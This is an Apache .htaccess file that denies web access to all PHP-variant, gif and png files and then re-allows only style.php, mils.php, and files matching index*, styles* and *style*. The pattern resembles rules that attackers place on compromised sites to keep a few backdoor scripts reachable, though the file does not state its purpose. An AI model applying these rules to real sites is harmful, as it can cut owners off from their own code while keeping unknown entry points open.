<Files ~ "\.(j|php|php3|php5|php4|phtml|gif|png|phpgif|pHp|PHP|PhP|PHp|pHP)$">
deny from all
</Files>
<Files "style.php">
Allow from all
</Files>
<Files "mils.php">
Allow from all
</Files>
<Files "index*">
Allow from all
</Files>
<Files "styles*">
Allow from all
</Files>
<Files "*style*">
Allow from all
</Files>